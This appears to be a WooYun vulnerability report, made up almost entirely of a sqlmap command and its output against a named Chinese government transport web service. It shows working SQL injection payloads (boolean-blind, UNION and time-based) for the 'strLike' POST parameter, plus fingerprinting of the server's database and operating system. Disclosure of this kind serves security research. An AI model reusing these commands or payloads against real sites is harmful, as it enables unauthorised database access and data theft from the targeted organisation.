WooYun.org

python sqlmap/sqlmap.py -u "http://jtj.nanhai.gov.cn:80/NHPORTALGIS/nhjt/JTService/LineMatch.asmx/GetLineSet" --data="strLike=1" -D jt_bus
[*] starting at 09:28:27
[09:28:27] [INFO] resuming back-end DBMS 'microsoft sql server' 
[09:28:28] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: strLike
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: strLike=1%' AND 1237=1237 AND '%'='
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: strLike=1%' UNION ALL SELECT CHAR(113)+CHAR(109)+CHAR(117)+CHAR(103)+CHAR(113)+CHAR(110)+CHAR(79)+CHAR(111)+CHAR(67)+CHAR(122)+CHAR(100)+CHAR(72)+CHAR(84)+CHAR(97)+CHAR(72)+CHAR(113)+CHAR(112)+CHAR(103)+CHAR(104)+CHAR(113)-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: strLike=-1303%' OR 1472=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[09:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005